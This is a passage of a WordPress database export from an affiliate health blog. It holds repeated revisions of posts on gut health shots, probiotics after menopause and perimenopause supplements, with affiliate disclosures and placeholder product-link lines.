4. Mood and Well-Being: Emerging research suggests a link between gut health and mental well-being. Some people report feeling happier and less anxious after regularly consuming gut health shots.

\n\n\n\n

Cons:

\n\n\n\n

1. Individual Variation: What works wonders for one person may not have the same effect on another. Gut health is highly individual, and not everyone will experience the same benefits.

\n\n\n\n

2. Expense: High-quality gut health shots can be pricey. Regular consumption can add up over time, making them less accessible for those on a tight budget.

\n\n\n\n

3. Quality Control: The effectiveness of these shots depends on the quality of the ingredients and specific probiotic strains used. Some products on the market may not meet the claims they make, so it\'s essential to choose reputable brands.

\n\n\n\n

4. Overconsumption: More isn\'t always better. Excessive consumption of probiotics, especially without a specific need, can lead to gastrointestinal discomfort. It\'s crucial to follow recommended serving sizes.

\n\n\n\n

5. Not a Cure-All: Gut health shots should complement a balanced diet and lifestyle. They aren\'t a magic solution to all health issues. If you have specific digestive problems or underlying health concerns, consult a healthcare professional.

\n\n\n\n



Conclusion

\n\n\n\n

Gut health shots can be a valuable tool for promoting digestive health, immunity, and overall well-being. However, they are not a one-size-fits-all solution, and their effectiveness may vary from person to person. To make an informed decision, consider your individual needs, budget, and the quality of the product you choose. If you decide to give them a try, do so in moderation and as part of a holistic approach to wellness, which includes a diverse diet and a healthy lifestyle.

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n','The Pros and Cons of Gut Health Shots','','inherit','closed','closed','','5574-revision-v1','','','2023-10-07 06:46:20','2023-10-07 06:46:20','',5574,'https://tummyrevolution.com/?p=5653',0,'revision','',0),(5654,1,'2023-10-07 06:54:48','0000-00-00 00:00:00','\n

Gut health shots are small, concentrated beverages designed to support and promote a healthy gut microbiome. They typically contain a combination of ingredients that can include probiotics, prebiotics, herbs, spices, and other nutrients that are believed to have digestive health benefits. Here\'s a breakdown of some common components found in gut health shots:

\n\n\n\n

1. Probiotics: Probiotics are live beneficial bacteria that are known to have a positive impact on gut health. Gut health shots may contain specific strains of probiotics that can help maintain a balanced and diverse gut microbiome.

\n\n\n\n

2. Prebiotics: Prebiotics are non-digestible fibers that serve as food for probiotics, promoting their growth and activity in the gut. Including prebiotics in gut health shots can help support the probiotics\' effectiveness.

\n\n\n\n

3. Herbs and Spices: Some gut health shots contain herbs and spices known for their potential digestive benefits. For example, ginger and turmeric are often added for their anti-inflammatory properties and potential to alleviate digestive discomfort.

This post contains affiliate links. This means I may earn a commission should you chose to make a purchase using my link.

Here are some suggestions of gut health shots to try out:

\n\n\n\n







\n','What are gut health shots and why should you take them','','draft','open','open','','','','','2023-10-07 06:54:48','2023-10-07 06:54:48','',0,'https://tummyrevolution.com/?p=5654',0,'post','',0),(5655,1,'2023-10-07 06:54:46','2023-10-07 06:54:46','\n

Gut health shots are small, concentrated beverages designed to support and promote a healthy gut microbiome. They typically contain a combination of ingredients that can include probiotics, prebiotics, herbs, spices, and other nutrients that are believed to have digestive health benefits. Here\'s a breakdown of some common components found in gut health shots:

\n\n\n\n

1. Probiotics: Probiotics are live beneficial bacteria that are known to have a positive impact on gut health. Gut health shots may contain specific strains of probiotics that can help maintain a balanced and diverse gut microbiome.

\n\n\n\n

2. Prebiotics: Prebiotics are non-digestible fibers that serve as food for probiotics, promoting their growth and activity in the gut. Including prebiotics in gut health shots can help support the probiotics\' effectiveness.

\n\n\n\n

3. Herbs and Spices: Some gut health shots contain herbs and spices known for their potential digestive benefits. For example, ginger and turmeric are often added for their anti-inflammatory properties and potential to alleviate digestive discomfort.

This post contains affiliate links. This means I may earn a commission should you chose to make a purchase using my link.

Here are some suggestions of gut health shots to try out:

\n\n\n\n







\n','What are gut health shots and why should you take them','','inherit','closed','closed','','5654-revision-v1','','','2023-10-07 06:54:46','2023-10-07 06:54:46','',5654,'https://tummyrevolution.com/?p=5655',0,'revision','',0),(5658,3,'2023-10-10 06:11:22','2023-10-10 06:11:22','\n

Women transition through menopause, they experience a range of physical and hormonal changes that can impact various aspects of their health, including gut health. Maintaining a balanced and healthy gut becomes even more crucial during this phase, as it can help alleviate digestive issues and contribute to overall well-being. In this blog, we\'ll explore the connection between menopause and gut health and provide actionable strategies to improve and maintain gut health post-menopause.

\n\n\n\n

The Menopause-Gut Health Connection

\n\n\n\n

The gut microbiome plays a vital role in digestion, nutrient absorption, immune function, and even mood regulation. During menopause, hormonal fluctuations can disrupt the delicate balance of the gut microbiota, potentially leading to digestive problems such as bloating, constipation, and increased gas. Additionally, shifts in hormones can influence gut sensitivity, potentially exacerbating conditions like irritable bowel syndrome (IBS).

\n\n\n\n

Strategies to Improve Gut Health After Menopause

\n\n\n\n
    \n
  1. Prioritize Fiber-Rich Foods:
  2. \n\n\n\n
  3. Include a variety of fiber-rich foods such as whole grains, fruits, vegetables, legumes, and nuts in your diet. Fiber promotes regular bowel movements, supports the growth of beneficial gut bacteria, and helps maintain a healthy gut lining.
  4. \n\n\n\n
  5. Stay Hydrated:
  6. \n\n\n\n
  7. Drinking an adequate amount of water supports healthy digestion, prevents constipation, and aids in the absorption of nutrients. Aim for at least 8 glasses of water per day.
  8. \n\n\n\n
  9. Incorporate Probiotics:
  10. \n\n\n\n
  11. Probiotics are beneficial bacteria that can enhance gut health. You can find probiotics in fermented foods like yogurt, kefir, sauerkraut, kimchi, and kombucha. Alternatively, consider taking a high-quality probiotic supplement after consulting your healthcare provider.
  12. \n\n\n\n
  13. Choose Prebiotic Foods:
  14. \n\n\n\n
  15. Prebiotics are non-digestible fibers that nourish beneficial gut bacteria. Foods like garlic, onions, leeks, asparagus, and bananas are rich in prebiotics and can support a diverse and healthy gut microbiome.
  16. \n\n\n\n
  17. Minimize Processed Foods and Sugar:
  18. \n\n\n\n
  19. High intake of processed foods and added sugars can negatively affect gut health by promoting the growth of harmful bacteria. Focus on whole, unprocessed foods to support a balanced microbiome.
  20. \n
\n\n\n\n

Manage Stress:

\n\n\n\n
    \n
  • Chronic stress can disrupt the gut-brain connection and impact gut health. Engage in stress-reduction techniques such as meditation, deep breathing, yoga, or mindfulness to support both mental well-being and gut health.
  • \n\n\n\n
  • Regular Physical Activity:
  • \n\n\n\n
  • Exercise has been shown to positively influence gut health by promoting the growth of beneficial bacteria. Aim for regular moderate-intensity activities like walking, swimming, or cycling.
  • \n\n\n\n
  • Limit Alcohol and Caffeine:
  • \n\n\n\n
  • Excessive alcohol and caffeine consumption can irritate the gut lining and disrupt gut balance. Moderation is key to maintaining gut health.
  • \n\n\n\n
  • Avoid Antibiotic Overuse:
  • \n\n\n\n
  • While antibiotics are sometimes necessary, overuse can disturb the gut microbiome. Discuss alternatives and potential probiotic supplementation with your healthcare provider when taking antibiotics.
  • \n\n\n\n
  • Consult a Professional:
  • \n\n\n\n
  • If you\'re experiencing persistent gut issues, consider consulting a registered dietitian or healthcare provider who can offer personalized advice and recommendations.
  • \n
\n\n\n\n

LINK TO THE RECOMMENDED BEST PROBIOTICS TO SUPPORT YOUR GUT HEALTH AFTER MENOPAUSE

\n\n\n\n

\n\n\n\n

Conclusion

\n\n\n\n

Prioritizing gut health after menopause is a valuable investment in your overall well-being. By making mindful dietary choices, incorporating probiotic-rich and prebiotic foods, managing stress, and adopting

\n','Nurse Your Gut Health After Menopause: Essential Strategies','','inherit','closed','closed','','5606-revision-v1','','','2023-10-10 06:11:22','2023-10-10 06:11:22','',5606,'https://tummyrevolution.com/?p=5658',0,'revision','',0),(5659,3,'2023-10-10 06:12:52','2023-10-10 06:12:52','\n

Women transition through menopause, they experience a range of physical and hormonal changes that can impact various aspects of their health, including gut health. Maintaining a balanced and healthy gut becomes even more crucial during this phase, as it can help alleviate digestive issues and contribute to overall well-being. In this blog, we\'ll explore the connection between menopause and gut health and provide actionable strategies to improve and maintain gut health post-menopause.

\n\n\n\n

The Menopause-Gut Health Connection

\n\n\n\n

The gut microbiome plays a vital role in digestion, nutrient absorption, immune function, and even mood regulation. During menopause, hormonal fluctuations can disrupt the delicate balance of the gut microbiota, potentially leading to digestive problems such as bloating, constipation, and increased gas. Additionally, shifts in hormones can influence gut sensitivity, potentially exacerbating conditions like irritable bowel syndrome (IBS).

\n\n\n\n

Strategies to Improve Gut Health After Menopause

\n\n\n\n
    \n
  1. Prioritize Fiber-Rich Foods:
  2. \n\n\n\n
  3. Include a variety of fiber-rich foods such as whole grains, fruits, vegetables, legumes, and nuts in your diet. Fiber promotes regular bowel movements, supports the growth of beneficial gut bacteria, and helps maintain a healthy gut lining.
  4. \n\n\n\n
  5. Stay Hydrated:
  6. \n\n\n\n
  7. Drinking an adequate amount of water supports healthy digestion, prevents constipation, and aids in the absorption of nutrients. Aim for at least 8 glasses of water per day.
  8. \n\n\n\n
  9. Incorporate Probiotics:
  10. \n\n\n\n
  11. Probiotics are beneficial bacteria that can enhance gut health. You can find probiotics in fermented foods like yogurt, kefir, sauerkraut, kimchi, and kombucha. Alternatively, consider taking a high-quality probiotic supplement after consulting your healthcare provider.
  12. \n\n\n\n
  13. Choose Prebiotic Foods:
  14. \n\n\n\n
  15. Prebiotics are non-digestible fibers that nourish beneficial gut bacteria. Foods like garlic, onions, leeks, asparagus, and bananas are rich in prebiotics and can support a diverse and healthy gut microbiome.
  16. \n\n\n\n
  17. Minimize Processed Foods and Sugar:
  18. \n\n\n\n
  19. High intake of processed foods and added sugars can negatively affect gut health by promoting the growth of harmful bacteria. Focus on whole, unprocessed foods to support a balanced microbiome.
  20. \n
\n\n\n\n

Manage Stress:

\n\n\n\n
    \n
  • Chronic stress can disrupt the gut-brain connection and impact gut health. Engage in stress-reduction techniques such as meditation, deep breathing, yoga, or mindfulness to support both mental well-being and gut health.
  • \n\n\n\n
  • Regular Physical Activity:
  • \n\n\n\n
  • Exercise has been shown to positively influence gut health by promoting the growth of beneficial bacteria. Aim for regular moderate-intensity activities like walking, swimming, or cycling.
  • \n\n\n\n
  • Limit Alcohol and Caffeine:
  • \n\n\n\n
  • Excessive alcohol and caffeine consumption can irritate the gut lining and disrupt gut balance. Moderation is key to maintaining gut health.
  • \n\n\n\n
  • Avoid Antibiotic Overuse:
  • \n\n\n\n
  • While antibiotics are sometimes necessary, overuse can disturb the gut microbiome. Discuss alternatives and potential probiotic supplementation with your healthcare provider when taking antibiotics.
  • \n\n\n\n
  • Consult a Professional:
  • \n\n\n\n
  • If you\'re experiencing persistent gut issues, consider consulting a registered dietitian or healthcare provider who can offer personalized advice and recommendations.
  • \n
\n\n\n\n

LINK TO THE RECOMMENDED BEST PROBIOTICS TO SUPPORT YOUR GUT HEALTH AFTER MENOPAUSE

\n\n\n\n

\n\n\n\n

Conclusion

\n\n\n\n

Prioritizing gut health after menopause is a valuable investment in your overall well-being. By making mindful dietary choices, incorporating probiotic-rich and prebiotic foods, managing stress, and adopting

\n','Nurse Your Gut Health After Menopause: Essential Strategies','','inherit','closed','closed','','5606-revision-v1','','','2023-10-10 06:12:52','2023-10-10 06:12:52','',5606,'https://tummyrevolution.com/?p=5659',0,'revision','',0),(5657,3,'2023-10-10 06:02:50','2023-10-10 06:02:50','\n

Gut health is important for people of all ages, but it becomes particularly crucial after menopause due to changes in hormone levels that can affect digestion and overall well-being. Probiotics can be a helpful addition to your diet to support gut health during and after menopause. However, it\'s important to note that the effectiveness of specific probiotics can vary from person to person, so what works best for one individual may not be the same for another. That said, here are some probiotic strains and foods that may help support gut health after menopause:

\n\n\n\n

Lactobacillus Acidophilus: This probiotic strain is well-known for its ability to maintain a healthy balance of beneficial bacteria in the gut. It can be found in yogurt and other fermented dairy products.

\n\n\n\n

Recommended Product

\n\n\n\n\"\"\n\n\n\n

Bifidobacterium: Various species of Bifidobacterium, such as Bifidobacterium bifidum and Bifidobacterium longum, are associated with digestive health and may help alleviate common digestive issues that can occur after menopause.

\n\n\n\n

Recommended Product

\n\n\n\n\"\"\n\n\n\n

Lactobacillus Rhamnosus: This strain is believed to help improve gut health and may be particularly beneficial for women experiencing digestive discomfort during menopause.

\n\n\n\n

Recommended Product

\n\n\n\n\"\"\n\n\n\n


Lactobacillus Casei: Known for its ability to support the immune system and promote digestive health, this strain is often found in yogurt and fermented foods.

\n\n\n\n

Recommended Product

\n\n\n\n\"\"\n\n\n\n

Saccharomyces Boulardii: This beneficial yeast can help support a healthy gut microbiome and may be especially useful if you\'re prone to digestive issues.

\n\n\n\n

Recommended Product

\n\n\n\n\"\"\n\n\n\n

Fermented Foods: In addition to probiotic supplements, incorporating fermented foods like kimchi, sauerkraut, kefir, and kombucha into your diet can provide a natural source of probiotics to support gut health.

\n\n\n\n

Prebiotic Foods: Prebiotics are non-digestible fibers that feed the beneficial bacteria in your gut. Foods like garlic, onions, leeks, asparagus, and bananas are rich in prebiotics and can complement your probiotic intake.

\n\n\n\n

When choosing probiotic supplements, it\'s essential to look for products that contain these specific strains or a combination of them. Additionally, ensure that the supplement provides an adequate number of live cultures (CFUs) to be effective. Consult with a healthcare professional before starting any new supplement regimen, as they can provide personalized recommendations based on your health needs and any specific digestive issues you may be experiencing.

\n\n\n\n

Summary

\n\n\n\n

Maintaining good gut health after menopause is important for overall well-being. Probiotic-rich foods and supplements can be beneficial, but individual responses may vary. A balanced diet, rich in fiber and low in processed foods, is also crucial for supporting a healthy gut during and after menopause.

\n','The Best Probiotics to Support Your Gut Health After Menopause','','inherit','closed','closed','','5586-revision-v1','','','2023-10-10 06:02:50','2023-10-10 06:02:50','',5586,'https://tummyrevolution.com/?p=5657',0,'revision','',0),(5661,3,'2023-10-10 06:15:15','2023-10-10 06:15:15','\n

Women transition through menopause, they experience a range of physical and hormonal changes that can impact various aspects of their health, including gut health. Maintaining a balanced and healthy gut becomes even more crucial during this phase, as it can help alleviate digestive issues and contribute to overall well-being. In this blog, we\'ll explore the connection between menopause and gut health and provide actionable strategies to improve and maintain gut health post-menopause.

\n\n\n\n

The Menopause-Gut Health Connection
The gut microbiome plays a vital role in digestion, nutrient absorption, immune function, and even mood regulation. During menopause, hormonal fluctuations can disrupt the delicate balance of the gut microbiota, potentially leading to digestive problems such as bloating, constipation, and increased gas. Additionally, shifts in hormones can influence gut sensitivity, potentially exacerbating conditions like irritable bowel syndrome (IBS).

\n\n\n\n

Strategies to Improve Gut health After Menopause

\n\n\n\n
    \n
  1. Prioritize Fiber-Rich Foods:
  2. \n\n\n\n
  3. Include a variety of fiber-rich foods such as whole grains, fruits, vegetables, legumes, and nuts in your diet. Fiber promotes regular bowel movements, supports the growth of beneficial gut bacteria, and helps maintain a healthy gut lining.
  4. \n\n\n\n
  5. Stay Hydrated:
  6. \n\n\n\n
  7. Drinking an adequate amount of water supports healthy digestion, prevents constipation, and aids in the absorption of nutrients. Aim for at least 8 glasses of water per day.
  8. \n\n\n\n
  9. Incorporate Probiotics:
  10. \n\n\n\n
  11. Probiotics are beneficial bacteria that can enhance gut health. You can find probiotics in fermented foods like yogurt, kefir, sauerkraut, kimchi, and kombucha. Alternatively, consider taking a high-quality probiotic supplement after consulting your healthcare provider.
  12. \n\n\n\n
  13. Choose Prebiotic Foods:
  14. \n\n\n\n
  15. Prebiotics are non-digestible fibers that nourish beneficial gut bacteria. Foods like garlic, onions, leeks, asparagus, and bananas are rich in prebiotics and can support a diverse and healthy gut microbiome.
  16. \n\n\n\n
  17. Minimize Processed Foods and Sugar:
  18. \n\n\n\n
  19. High intake of processed foods and added sugars can negatively affect gut health by promoting the growth of harmful bacteria. Focus on whole, unprocessed foods to support a balanced microbiome.
  20. \n
\n\n\n\n

Manage Stress:

\n\n\n\n
    \n
  • Chronic stress can disrupt the gut-brain connection and impact gut health. Engage in stress-reduction techniques such as meditation, deep breathing, yoga, or mindfulness to support both mental well-being and gut health.
  • \n\n\n\n
  • Regular Physical Activity:
  • \n\n\n\n
  • Exercise has been shown to positively influence gut health by promoting the growth of beneficial bacteria. Aim for regular moderate-intensity activities like walking, swimming, or cycling.
  • \n\n\n\n
  • Limit Alcohol and Caffeine:
  • \n\n\n\n
  • Excessive alcohol and caffeine consumption can irritate the gut lining and disrupt gut balance. Moderation is key to maintaining gut health.
  • \n\n\n\n
  • Avoid Antibiotic Overuse:
  • \n\n\n\n
  • While antibiotics are sometimes necessary, overuse can disturb the gut microbiome. Discuss alternatives and potential probiotic supplementation with your healthcare provider when taking antibiotics.
  • \n\n\n\n
  • Consult a Professional:
  • \n\n\n\n
  • If you\'re experiencing persistent gut issues, consider consulting a registered dietitian or healthcare provider who can offer personalized advice and recommendations.
  • \n
\n\n\n\n

LINK TO THE RECOMMENDED BEST PROBIOTICS TO SUPPORT YOUR GUT HEALTH AFTER MENOPAUSE

\n\n\n\n

\n\n\n\n

Conclusion

\n\n\n\n

Prioritizing gut health after menopause is a valuable investment in your overall well-being. By making mindful dietary choices, incorporating probiotic-rich and prebiotic foods, managing stress, and adopting

\n','Nurse Your Gut Health After Menopause: Essential Strategies','','inherit','closed','closed','','5606-revision-v1','','','2023-10-10 06:15:15','2023-10-10 06:15:15','',5606,'https://tummyrevolution.com/?p=5661',0,'revision','',0),(5662,3,'2023-10-10 07:03:24','2023-10-10 07:03:24','\n

Menopause is a significant milestone in a woman\'s life, marked by the cessation of menstruation and hormonal changes. While menopause brings about various changes in the body, including hot flashes and mood swings, it also has an impact on gut health. Many post-menopausal women may experience digestive issues, such as bloating, constipation, and a weakened immune system. Probiotics can be a valuable addition to the diet of post-menopausal women, offering numerous benefits for gut health and overall well-being. In this blog post, we will explore the best probiotics for post-menopausal women and how they can help maintain a healthy digestive system.

\n\n\n\n

Understanding Probiotics
Before delving into the best probiotics for post-menopausal women, it\'s important to understand what probiotics are. Probiotics are live microorganisms, usually bacteria or yeast, that are beneficial for your health, especially your digestive system. They are often referred to as \"good\" or \"friendly\" bacteria because they help maintain a balanced gut microbiome, which is essential for digestion and overall health.

\n\n\n\n

The Impact of Menopause on Gut Health
Menopause can bring about hormonal changes that affect the composition of the gut microbiome. These changes can lead to an imbalance in the gut bacteria, potentially causing digestive issues and compromising the immune system. Common gastrointestinal problems that post-menopausal women may experience include:
Constipation
Bloating
Diarrhea
Gut inflammation
Weakened immune system
Choosing the Right Probiotics

\n\n\n\n

BEST PROBIOTICS FOR POST-MENOPAUSAL WOMAN
Here are some of the best probiotics for post-menopausal women:

\n\n\n\n

Lactobacillus Acidophilus: This strain is known for its ability to support digestive health and alleviate symptoms like bloating and constipation.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

\n\n\n\n

Bifidobacterium Lactis: Bifidobacterium lactis may help boost the immune system and improve overall gut health.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Lactobacillus Rhamnosus: This strain can help with diarrhea and may also have mood-boosting effects.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Lactobacillus Plantarum: It is known for its anti-inflammatory properties and may help reduce gut inflammation.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Saccharomyces Boulardii: This yeast-based probiotic can help with diarrhea and gut infections.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Summary:

\n\n\n\n

Maintaining gut health is crucial for post-menopausal women to minimize digestive issues and support overall well-being. Probiotics offer a natural and effective way to achieve this. By selecting the right probiotic strains and consulting with a healthcare provider, post-menopausal women can optimize their gut health and enjoy the benefits of a balanced microbiome. Remember that consistency is key when taking probiotics, and it may take some time to see noticeable improvements in gut health.

\n\n\n\n

\n','Best Probiotics for Post-Menopausal Women: A Guide to Gut Health','','inherit','closed','closed','','5513-revision-v1','','','2023-10-10 07:03:24','2023-10-10 07:03:24','',5513,'https://tummyrevolution.com/?p=5662',0,'revision','',0),(5663,3,'2023-10-10 07:32:01','2023-10-10 07:32:01','\n

Perimenopause is a natural phase in a woman\'s life that typically occurs in her 40s or early 50s, leading up to menopause. During this transitional period, hormonal fluctuations can cause a variety of physical and emotional symptoms, such as hot flashes, mood swings, and sleep disturbances. While these changes are a normal part of aging, they can sometimes be challenging to navigate. Thankfully, there are various perimenopause supplements for women that can help alleviate these symptoms and promote overall well-being. In this comprehensive guide, we\'ll explore some of the best perimenopause supplements to consider.

\n\n\n\n

1.Black Cohosh
Black cohosh is a popular herbal remedy for managing perimenopausal symptoms. It is believed to help regulate hormone levels, particularly estrogen, which can decline during perimenopause. Studies have shown that black cohosh may be effective in reducing hot flashes, night sweats, and mood swings. It is available in various forms, including capsules, tablets, and tinctures.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

2.Soy Isoflavones
Soy isoflavones are natural compounds found in soybeans and soy products. These compounds have a chemical structure similar to estrogen, making them known as phytoestrogens. Phytoestrogens can help balance hormone levels in the body, potentially reducing the severity of hot flashes and other menopausal symptoms. Women who include soy-based foods or supplements in their diet may experience relief from perimenopausal symptoms.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

3.Evening Primrose Oil
Evening primrose oil is derived from the seeds of the evening primrose plant and is rich in gamma-linolenic acid (GLA). GLA is an essential fatty acid that can help regulate hormone production and reduce inflammation. Many women find that taking evening primrose oil supplements can improve skin health, alleviate breast tenderness, and reduce mood swings.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

4. Vitamin D
Vitamin D is essential for overall health, and it plays a crucial role in bone health and immune function. During perimenopause and menopause, the risk of osteoporosis increases due to declining estrogen levels. Supplementing with vitamin D can help maintain strong bones and reduce the risk of fractures. Additionally, vitamin D may also contribute to better mood and cognitive function.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

5.Calcium and Magnesium
As estrogen levels decrease during perimenopause, the body\'s ability to absorb calcium from food diminishes. This can lead to a higher risk of bone loss and osteoporosis. Calcium and magnesium supplements can help maintain bone density and reduce the risk of fractures. These minerals are also beneficial for muscle function and may help with sleep disturbances and muscle cramps.

\n\n\n\n

Lint to Recommended Product

\n\n\n\n\"\"\n\n\n\n

6.B Vitamins
B vitamins, including B6 and B12, are essential for maintaining energy levels and supporting overall well-being. They play a role in regulating mood and reducing stress and anxiety, which are common perimenopausal symptoms. B vitamin supplements can help combat fatigue and enhance mental clarity during this transitional phase.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

7.Omega-3 Fatty Acids
Omega-3 fatty acids, found in fish oil supplements, are known for their anti-inflammatory properties. They can help alleviate joint pain, reduce mood swings, and support cardiovascular health. Omega-3 supplements may also contribute to healthier skin and hair.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

8.Probiotics
Gut health is closely linked to overall well-being, and during perimenopause, hormonal fluctuations can sometimes disrupt the gut microbiome. Probiotic supplements can help restore and maintain a healthy balance of gut bacteria, potentially reducing bloating, digestive issues, and immune system challenges.

\n\n\n\n

Link to Recommended Product

\n\n\n\n\"\"\n\n\n\n

Conclusion

\n\n\n\n

Perimenopause is a natural phase in a woman\'s life, but it doesn\'t have to be a time of discomfort and distress. These perimenopause supplements for women can provide relief from a wide range of symptoms, allowing you to navigate this transitional phase with greater ease and confidence. However, it\'s important to consult with a healthcare provider before adding any new supplements to your routine, as individual needs and responses may vary. In combination with a healthy lifestyle, these supplements can contribute to a smoother perimenopausal journey, helping you embrace the changes that come with this transformative phase of life.

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n','Perimenopause Supplements for Women: A Comprehensive Guide','','inherit','closed','closed','','5473-revision-v1','','','2023-10-10 07:32:01','2023-10-10 07:32:01','',5473,'https://tummyrevolution.com/?p=5663',0,'revision','',0),(5666,3,'2023-10-10 07:36:00','2023-10-10 07:36:00','\n

Women transition through menopause, they experience a range of physical and hormonal changes that can impact various aspects of their health, including gut health. Maintaining a balanced and healthy gut becomes even more crucial during this phase, as it can help alleviate digestive issues and contribute to overall well-being. In this blog, we\'ll explore the connection between menopause and gut health and provide actionable strategies to improve and maintain gut health post-menopause.

\n\n\n\n

The Menopause-Gut Health Connection
The gut microbiome plays a vital role in digestion, nutrient absorption, immune function, and even mood regulation. During menopause, hormonal fluctuations can disrupt the delicate balance of the gut microbiota, potentially leading to digestive problems such as bloating, constipation, and increased gas. Additionally, shifts in hormones can influence gut sensitivity, potentially exacerbating conditions like irritable bowel syndrome (IBS).

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to sign up for a program or make a purchase using my link.

\n\n\n\n

Strategies to Improve Gut health After Menopause

\n\n\n\n
    \n
  1. Prioritize Fiber-Rich Foods:
  2. \n\n\n\n
  3. Include a variety of fiber-rich foods such as whole grains, fruits, vegetables, legumes, and nuts in your diet. Fiber promotes regular bowel movements, supports the growth of beneficial gut bacteria, and helps maintain a healthy gut lining.
  4. \n\n\n\n
  5. Stay Hydrated:
  6. \n\n\n\n
  7. Drinking an adequate amount of water supports healthy digestion, prevents constipation, and aids in the absorption of nutrients. Aim for at least 8 glasses of water per day.
  8. \n\n\n\n
  9. Incorporate Probiotics:
  10. \n\n\n\n
  11. Probiotics are beneficial bacteria that can enhance gut health. You can find probiotics in fermented foods like yogurt, kefir, sauerkraut, kimchi, and kombucha. Alternatively, consider taking a high-quality probiotic supplement after consulting your healthcare provider.
  12. \n\n\n\n
  13. Choose Prebiotic Foods:
  14. \n\n\n\n
  15. Prebiotics are non-digestible fibers that nourish beneficial gut bacteria. Foods like garlic, onions, leeks, asparagus, and bananas are rich in prebiotics and can support a diverse and healthy gut microbiome.
  16. \n\n\n\n
  17. Minimize Processed Foods and Sugar:
  18. \n\n\n\n
  19. High intake of processed foods and added sugars can negatively affect gut health by promoting the growth of harmful bacteria. Focus on whole, unprocessed foods to support a balanced microbiome.
  20. \n
\n\n\n\n

Manage Stress:

\n\n\n\n
    \n
  • Chronic stress can disrupt the gut-brain connection and impact gut health. Engage in stress-reduction techniques such as meditation, deep breathing, yoga, or mindfulness to support both mental well-being and gut health.
  • \n\n\n\n
  • Regular Physical Activity:
  • \n\n\n\n
  • Exercise has been shown to positively influence gut health by promoting the growth of beneficial bacteria. Aim for regular moderate-intensity activities like walking, swimming, or cycling.
  • \n\n\n\n
  • Limit Alcohol and Caffeine:
  • \n\n\n\n
  • Excessive alcohol and caffeine consumption can irritate the gut lining and disrupt gut balance. Moderation is key to maintaining gut health.
  • \n\n\n\n
  • Avoid Antibiotic Overuse:
  • \n\n\n\n
  • While antibiotics are sometimes necessary, overuse can disturb the gut microbiome. Discuss alternatives and potential probiotic supplementation with your healthcare provider when taking antibiotics.
  • \n\n\n\n
  • Consult a Professional:
  • \n\n\n\n
  • If you\'re experiencing persistent gut issues, consider consulting a registered dietitian or healthcare provider who can offer personalized advice and recommendations.
  • \n
\n\n\n\n

LINK TO THE RECOMMENDED BEST PROBIOTICS TO SUPPORT YOUR GUT HEALTH AFTER MENOPAUSE

\n\n\n\n

\n\n\n\n

Conclusion

\n\n\n\n

Prioritizing gut health after menopause is a valuable investment in your overall well-being. By making mindful dietary choices, incorporating probiotic-rich and prebiotic foods, managing stress, and adopting

\n','Nurse Your Gut Health After Menopause: Essential Strategies','','inherit','closed','closed','','5606-revision-v1','','','2023-10-10 07:36:00','2023-10-10 07:36:00','',5606,'https://tummyrevolution.com/?p=5666',0,'revision','',0),(5667,3,'2023-10-10 07:37:05','2023-10-10 07:37:05','\n

Gut health is important for people of all ages, but it becomes particularly crucial after menopause due to changes in hormone levels that can affect digestion and overall well-being. Probiotics can be a helpful addition to your diet to support gut health during and after menopause. However, it\'s important to note that the effectiveness of specific probiotics can vary from person to person, so what works best for one individual may not be the same for another.

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to sign up for a program or make a purchase using my link.

\n\n\n\n

That said, here are some probiotic strains and foods that may help support gut health after menopause:

\n\n\n\n

Lactobacillus Acidophilus: This probiotic strain is well-known for its ability to maintain a healthy balance of beneficial bacteria in the gut. It can be found in yogurt and other fermented dairy products.

\n\n\n\n

Recommended Product

\n\n\n\n\"\"\n\n\n\n

Bifidobacterium: Various species of Bifidobacterium, such as Bifidobacterium bifidum and Bifidobacterium longum, are associated with digestive health and may help alleviate common digestive issues that can occur after menopause.

\n\n\n\n

Recommended Product

\n\n\n\n\"\"\n\n\n\n

Lactobacillus Rhamnosus: This strain is believed to help improve gut health and may be particularly beneficial for women experiencing digestive discomfort during menopause.

\n\n\n\n

Recommended Product

\n\n\n\n\"\"\n\n\n\n


Lactobacillus Casei: Known for its ability to support the immune system and promote digestive health, this strain is often found in yogurt and fermented foods.

\n\n\n\n

Recommended Product

\n\n\n\n\"\"\n\n\n\n

Saccharomyces Boulardii: This beneficial yeast can help support a healthy gut microbiome and may be especially useful if you\'re prone to digestive issues.

\n\n\n\n

Recommended Product

\n\n\n\n\"\"\n\n\n\n

Fermented Foods: In addition to probiotic supplements, incorporating fermented foods like kimchi, sauerkraut, kefir, and kombucha into your diet can provide a natural source of probiotics to support gut health.

\n\n\n\n

Prebiotic Foods: Prebiotics are non-digestible fibers that feed the beneficial bacteria in your gut. Foods like garlic, onions, leeks, asparagus, and bananas are rich in prebiotics and can complement your probiotic intake.

\n\n\n\n

When choosing probiotic supplements, it\'s essential to look for products that contain these specific strains or a combination of them. Additionally, ensure that the supplement provides an adequate number of live cultures (CFUs) to be effective. Consult with a healthcare professional before starting any new supplement regimen, as they can provide personalized recommendations based on your health needs and any specific digestive issues you may be experiencing.

\n\n\n\n

Summary

\n\n\n\n

Maintaining good gut health after menopause is important for overall well-being. Probiotic-rich foods and supplements can be beneficial, but individual responses may vary. A balanced diet, rich in fiber and low in processed foods, is also crucial for supporting a healthy gut during and after menopause.

\n','The Best Probiotics to Support Your Gut Health After Menopause','','inherit','closed','closed','','5586-revision-v1','','','2023-10-10 07:37:05','2023-10-10 07:37:05','',5586,'https://tummyrevolution.com/?p=5667',0,'revision','',0),(5665,3,'2023-10-10 07:35:09','2023-10-10 07:35:09','\n

